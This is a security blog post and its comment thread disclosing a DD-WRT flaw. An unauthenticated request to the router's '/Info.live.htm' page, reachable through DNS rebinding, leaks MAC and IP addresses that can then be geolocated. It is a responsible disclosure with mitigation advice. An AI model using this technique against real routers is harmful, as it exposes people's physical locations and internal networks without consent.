DD-WRT, I Know Where You Live

I’ve always envied CSI’s amazing IP address geolocation capabilities. Not only can they get your exact physical address based solely off your IP (right down to your hotel room number!), it even works on IP addresses that don’t exist!

While that level of IP address tracking is beyond the grasp of us mere mortals, MAC address geolocation provided by Google Location Services and Skyhook is pretty close. Just feed them the MAC address of your wireless router and they will tell you, with scary precision, where you are.

But what if you wanted to find the wireless MAC address of someone else’s router – remotely? Thanks to an information disclosure vulnerability in DD-WRT, you can.

If you are running DD-WRT and have set the ‘info page’ configuration to either ‘enabled’ (the default) or ‘disabled’, an unauthenticated remote attacker can get your:

  • Router’s LAN/WAN/WLAN MAC addresses
  • Router’s internal IP address
  • Internal client’s IP addresses and host names

All they have to do is make a GET request for the ‘/Info.live.htm’ page.

Now, I know what you’re thinking: “Surely this only affects DD-WRT routers that have remote administration enabled!” No, it doesn’t. And don’t call me Shirley.

This is exploitable even with remote administration disabled because DD-WRT is also vulnerable to a public IP DNS rebinding attack. That means that when a user inside your network browses to any Web site, that site can proxy requests through the user’s browser and pull this information from the router’s internal Web interface – no authentication or remote administration required. And, thanks to Rebind, pulling off this type of rebinding attack is pretty simple.

You can read a more detailed write-up on the vulnerability here, or watch the below video demonstrating the use of Rebind and Google Location Services to obtain the location of a DD-WRT router.

Tagged , , , , . Bookmark the permalink.

33 Responses to DD-WRT, I Know Where You Live

  1. Pingback: Tweets that mention DD-WRT information disclosure vulnerability: -- Topsy.com

  2. jimbo says:

    Your recommended steps for mitigation – enable info site, require password – do not appear to work for v24-sp1 10011. Quite unfortunate.

  3. jimbo says:

    Urp – oops, never mind that previous comment; my password was cached. Ignore the idiot behind the curtain.

  4. Pingback: DD-WRT, I Know Where You Live « Laboratory B

  5. Pingback: “DD-WRT, I Know Where You Live” - #!/zitstif.no-ip.org/

  6. coldfront says:

    can’t you just disable the httpd on the router? I always do that anyway, I just SSH in and manually start httpd if i need to change a setting. Saves ram.

  7. DD-WRT v24-sp2 (08/07/10) std
    (SVN revision 14896) seems to be not vulnerable.

    • Craig says:

      Thomas, I’m running DD-WRT v24-sp2 build 14896 (08/07/10) std on a WRT-160N right now and this definitely works. Are you sure you haven’t set the page info to be password protected? That is the suggested mitigation for this issue (it still works if the info page is disabled though).

  8. Craig says:

    @coldfront:

    Yes, you can disable the httpd service and that will obviously fix any Web-based issues.

  9. Thanks for revealing this vulnerability in the DD-WRT firmware. Your mitigation steps worked great. Thanks again!

  10. Pingback: Simon Hughes Fredsted» Blog Archive » Fix: Securing the DD-WRT location vulnerability

  11. Pingback: DD-WRT, I Know Where You Live « irbnews

  12. What a post. Thanks a lot!

  13. Chris says:

    All of the information in the “vulnerability” is scraped from the Info site.

    There’s an option in the Administration pages for “Info Site Password Protection”. AFAIK, this closes the vulnerability.

  14. Craig says:

    Chris,

    Correct; as stated in the PDF, this does not affect the “Info Site Password Protection” setting.

    The issue is: if you have set Info Site to disabled in order to restrict this information, the Info.live.htm page can still be accessed which is certainly not the intended or desired behavior.

  15. I believe that if you port forward the corresponding web interface port(s) to somewhere, you are not vulnerable to the rebinding attack. This may also work well as a quick fix, just port forward the ports to somewhere using the web interface.

  16. Pingback: Vulnerabilidad en DD-WRT permite la geolocalización casi exacta de sus usuarios : Redes Zone : Portal sobre telecomunicaciones y redes

  17. Craig: you are absolutely right, my bad.

  18. ismartypants says:

    Thanks for this interesting post. I will be sure to get the word out about this site 🙂 Excellent post. Can’t wait to see the next blog post.

  19. Pingback: Уязвимости в Tor, Evince, Subversion, libpng, Mono, Wireshark, Gimp, DD-WRT, VLC и Libxml2 | AllUNIX.ru – Всероссийский портал о UNIX-системах

  20. Pingback: Уязвимости в Tor, Evince, Subversion, libpng, Mono, Wireshark, Gimp, DD-WRT, VLC и Libxml2

  21. ‘,: I am very thankful to this topic because it really gives useful information ;:~

  22. Pingback: DD-WRT, I Know Where You Live | Linux-backtrack.com

  23. Great write-up, but this wouldn’t really to work with my router ip address, any helpful hints?

  24. Pingback: DD-WRT Vulnerável

  25. Pingback: /dev/ttyS0 » Blog Archive » SHODAN Researches DD-WRT Vulnerability

  26. cb says:

    Thanks for posting this. I have verified that the following dd-WRT version does not have this vulnerability:

    DD-WRT v24-sp2 (07/22/09) mini – build 12548M NEWD Eko

    As you can see from the build date, its older than many, I went on and “enabled” Info Site Password Protection just to be safe.

    I was unable to access my dd-WRT enabled firewall/router from the http://samy.pl/mapxss/ or from a netbook that is internally on my LAN.

  27. Klaus says:

    Don t understand how exactly i got in here but i m really glad i ve found it. Hmmm… i m starting to believe google is begining to read my mind 🙂 Nice work!

  28. uggs smithfield sale says:

    strongzz Thanks for another wonderful article. Where else could anybody get that kind of information in such a perfect way of writing? I have a presentation next week, and I’m on the look for such information.

  29. Pingback: DD-WRT Security Vulnerability | vincentkong.com

  30. Claus says:

    Hello there…
    Can someone test a recent build of DD-WRT for the DNS-Rebind-Issue? I didn’t find any DNS-Rebind-Test-Website, and I don’t have a Webserver out there available where i could install the package from the Google-Dev-Site.
    I know I can enable the Password for the info-site, but the real threat in my opinion is the DNS-Rebind-Issue…
    Greetings from Austria

  31. Pingback: Installing dd-wrt on a Linksys WRT320N wireless router | Kirkian Computing

  32. Pingback: Installing dd-wrt on a Linksys WRT320N wireless router – Kirkian Computing

Leave a Reply

Your email address will not be published. Required fields are marked *